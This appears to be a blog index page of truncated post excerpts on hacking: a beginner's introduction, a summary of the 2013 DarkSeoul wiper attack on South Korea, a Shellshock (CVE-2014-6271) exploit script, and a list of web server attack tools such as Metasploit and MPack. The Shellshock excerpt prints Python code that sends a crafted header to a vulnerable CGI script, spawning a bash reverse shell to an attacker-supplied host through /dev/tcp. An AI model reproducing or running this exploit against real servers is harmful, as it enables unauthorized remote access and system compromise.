First and foremost, it is important for you to understand that ‘hacking’ is a broad term. There are many aspects to it, most of which require several programming skills, but that shouldn’t stop you from using the tools made available by the internet for you to take advantage of. Go to the HTMLdog website and learn some HTML first, it …
South Korean Malware Attack
Executive Summary Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul. The common attributes of the attack campaign are the following: •The malicious file wipes …
Check vulnerable reverse shell CGI (shellshock)
# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<4): print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0] print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080” % sys.argv[0] exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3] headers = {“Content-type”: “application/x-www-form-urlencoded”, …
Web server attack tools
Some of the common web server attack tools include; Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server. MPack– this is a web exploitation tool. It was written in PHP and is backed by …
